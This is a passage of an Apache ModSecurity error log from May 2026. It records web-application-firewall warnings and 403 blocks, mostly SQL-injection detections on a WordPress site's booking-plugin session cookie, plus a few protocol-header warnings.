[Mon May 11 22:22:36.562685 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6i3o_DFxNSZVmaX3OHgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:37.033625 2026] [security2:error] [pid 1601130:tid 1601173] [client 195.114.15.48:55830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6i3EgAO_835W6c1mVGwAAAFc"]
[Mon May 11 22:22:38.356177 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6jno_DFxNSZVmaX3OIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:38.356464 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6jno_DFxNSZVmaX3OIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:38.681559 2026] [security2:error] [pid 1588898:tid 1589210] [client 162.14.109.170:34564] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agI6jqFW67LJTsgN3jQLIQAAABU"]
[Mon May 11 22:22:41.035288 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6jno_DFxNSZVmaX3OIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:42.723752 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6kno_DFxNSZVmaX3OKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:42.724068 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6kno_DFxNSZVmaX3OKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:43.363930 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6kno_DFxNSZVmaX3OKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:44.357586 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6lHo_DFxNSZVmaX3OMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:44.357874 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6lHo_DFxNSZVmaX3OMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:44.989516 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6lHo_DFxNSZVmaX3OMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:45.229522 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6lXo_DFxNSZVmaX3OOQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:45.229810 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6lXo_DFxNSZVmaX3OOQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:45.784413 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6lXo_DFxNSZVmaX3OOQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:45.903968 2026] [security2:error] [pid 1606352:tid 1606429] [client 162.14.109.170:48694] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agI6lXo_DFxNSZVmaX3OPgAAAMo"], referer: http://www.cpc-entreprises.com
[Mon May 11 22:22:47.046034 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6l3o_DFxNSZVmaX3ORgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:47.046323 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6l3o_DFxNSZVmaX3ORgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:47.419935 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6l3o_DFxNSZVmaX3ORgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:48.150503 2026] [security2:error] [pid 1590352:tid 1590400] [client 49.51.233.46:42358] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/confidentialite.html"] [unique_id "agI6mK1q0G_aXAqWauT59QAAAIg"]
[Mon May 11 22:22:48.257225 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6mHo_DFxNSZVmaX3OSAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:48.257602 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6mHo_DFxNSZVmaX3OSAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:48.849800 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6mHo_DFxNSZVmaX3OSAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:49.439686 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6mXo_DFxNSZVmaX3OTAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:49.439995 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6mXo_DFxNSZVmaX3OTAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:50.057130 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6mXo_DFxNSZVmaX3OTAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:53.538724 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6nXo_DFxNSZVmaX3OYAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:53.539005 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6nXo_DFxNSZVmaX3OYAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:54.849707 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6nXo_DFxNSZVmaX3OYAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:57.054177 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6oXo_DFxNSZVmaX3ObAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:57.054480 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6oXo_DFxNSZVmaX3ObAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:57.614480 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6oXo_DFxNSZVmaX3ObAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:01.012102 2026] [:error] [pid 1588898:tid 1588922] [client 144.76.19.157:52070] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:23:01.156035 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6pXo_DFxNSZVmaX3OdgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:01.156336 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6pXo_DFxNSZVmaX3OdgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:02.337339 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6pXo_DFxNSZVmaX3OdgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:05.835610 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri 